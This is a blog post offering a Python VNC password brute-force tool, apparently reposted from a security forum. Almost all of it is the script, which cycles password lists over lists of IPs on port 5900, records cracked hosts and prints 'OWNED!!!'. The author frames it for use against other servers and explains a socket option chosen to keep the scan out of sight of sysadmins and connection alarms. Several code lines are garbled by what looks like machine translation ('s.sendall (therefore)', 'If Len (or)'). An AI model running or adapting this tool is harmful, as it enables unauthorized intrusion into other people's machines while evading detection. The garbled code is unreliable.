Sunday, 29 November 2015

[RST] VNC Brute Force Tool [Python]




Well, first start by explaining a common problem in most open source programs pen.testing. 
Many, if not all, use blocking sockets. This means that if you created a connection to the IP X, but it for various reasons, refused to answer, that connection will stay on until a) program is terminated or b) to access system default timeout error, which is usually huge. Hydra, Medusa, ncrack up and nmap VNC-Gross .nse all have the same problem. They were designed poorly, to some extent, when you test your network, this problem does not happen. So we use a non-blocking sockets. This means that if after a defined number of seconds pass and we get no response, we will close the connection. I set to 25 seconds, but may change the source if needed.


Code:
import socket, struct
from Crypto.Cipher import DES
from sys import exc_info, exit, version_info, maxint
import sys
import Queue, threading
bad = open('bad.txt','w')
valid = open('valid.txt','a')
err = open('error.txt','w')
cracked = []
try:
 with open('valid.txt','rU') as vf: valids = vf.read().splitlines()
 for val in valids:
  h1 = val.split(" ")[0]
  cracked.append(h1)
except:
 pass
  
queue = Queue.Queue(maxsize=4000)
with open('ips.txt','rU') as ipf: hosts = ipf.read().splitlines()
with open('pass.txt','rU') as pf: passwords = pf.read().splitlines()
ThreadNmber = int(sys.argv[1])
Verbose = str(sys.argv[2])

def gen_key(key):
 try:
  newkey = []
  for ki in range(len(key)):
   bsrc = ord(key[ki])
   btgt = 0
   for i in range(8):
    if bsrc & (1 << i):
     btgt = btgt | (1 << 7-i)
   newkey.append(btgt)

  if version_info[0] == 2:
   return ''.join(chr(c) for c in newkey)
  else:
   return bytes(newkey)
 except:
  pass

   
class VNCBrute(threading.Thread):
  def __init__(self, queue):
  threading.Thread.__init__(self)
  self.queue = queue
  
 def run(self):
  while True:
   host,passwd = self.queue.get()
   self.checker(host,passwd)
   self.queue.task_done()
 
 def checker(self,host,password):
  try:
   if host in cracked: return False
   
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.setblocking(0)
   s.settimeout (25)
   s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
   
   s.connect((host,5900))
   resp = s.recv (99)
   
   version = resp[:11].decode('ascii')
   If Len (or)> 12: 
    s.close()
    return False
   
   major, minor = version[6], version[10]
   if (major, minor) in [('3', '8'), ('4', '1')]: proto = b'RFB 003.008\n'
   elif (major, minor) == ('3', '7'): proto = b'RFB 003.007\n'
   else: proto = b'RFB 003.003\n'
   
   s.sendall (therefore)
   resp = s.recv (99)
   
   if minor in ('7', '8'):
    code = ord(resp[0:1])
    if code == 0: 
     s.close()
     return False 
    s.sendall(b'\x02')
    resp = s.recv (99)
   else:
    code = ord(resp[3:4])
    if code != 2: 
     s.close()
     return False
    resp = or [-16:]
   
   If Len (or)! = 16: 
    s.close()
    return False
   
   sys.stdout.write("\r[+]Trying "+host+' '+password+'                                                      ')
   sys.stdout.flush()
   pw = password.ljust (8, '\ x00') [8]
   key = gen_key(pw)
   
   des = DES.new(key, DES.MODE_ECB)
   enc = des.encrypt(resp)
   
   s.sendall(enc)
   resp = s.recv (99)
   
   code = ord(resp[3:4])
   mesg = resp[8:].decode('ascii', 'ignore')
   
   if code == 1:
    if Verbose == 'v':
     bad.write(host+'\n')
     bad.flush()
    s.close()
   Elif code == 0:
    valid.write(host+' '+password+'\n')
    valid.flush()
    cracked.append(host)
    print '\rOWNED!!! '+' '+host+' '+password,'                                                                      '
    s.close()
   else: 
    s.close()
    return False
  except Exception, e: 
   err.write(host+'\n')
   err.flush()
   pass
 
 
def main():
 try:
  i = 0
  for i in range(ThreadNmber):
   t = VNCBrute(queue)
   t.daemon = True
   t.start()
   i += 1
 except Exception, e:
  print 'Stopped at',i,'Threads'
  sys.exit()
 print i,'Threads spawned'
 
 for password in passwords:
  for host in hosts:
   queue.put((host,password))
   
 queue.join()


print '[+] VNC Brute Force Tool'
print '[+] Author: Elohim ' 
main()
We have an option which I think is interesting. 
Let's say we do not want to make too much noise when using the program on another server. If a sysadmin looking through the number of connections, it is horrified (or if you have any trigger alarm when it exceeds a certain number of outgoing connections) 
so I used

Code:
setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
That means that since we closed the connection socket that instead enter the TIME_WAIT state and stand 120s when it default on most systems, will be closed abruptly and disappears from netstat. 
It is also helpful when there is a limit the number of ephemeral ports used (rarely) Usage:


Code:
python vnc.py 100 v/no
Where: 
100 = number of threads. Tested up to 1,400 threads, go flawlessly if we allow internet speed. 
V / no = If you leave than V, and uses only a username and password, will be written in the file that actually runs bad.txt ONLY software IPs VNC, and no authentication was successful. 
Why is it useful? I debated the issue a little at a script like WordPress. In short, will remove IPs that have nothing to do with VNC, but it happens to have port 5900 open. If left with no, do not do this filtering. It is necessary only once, and then reuse the IPs bad.txt If you have questions, do not hesitate to ask. I'm sick to see people selling such scripts. I assure you that there is nothing that can bring another program in addition to this presented. It covers absolutely all requirements for speed and efficiency. Do not give money on nonsense, take the children milk =) Enjoy! PS If anyone wants to discuss the RFB and issue VNC sites that heaven and username, look forward to discussing the question . 

0 comments:

Post a comment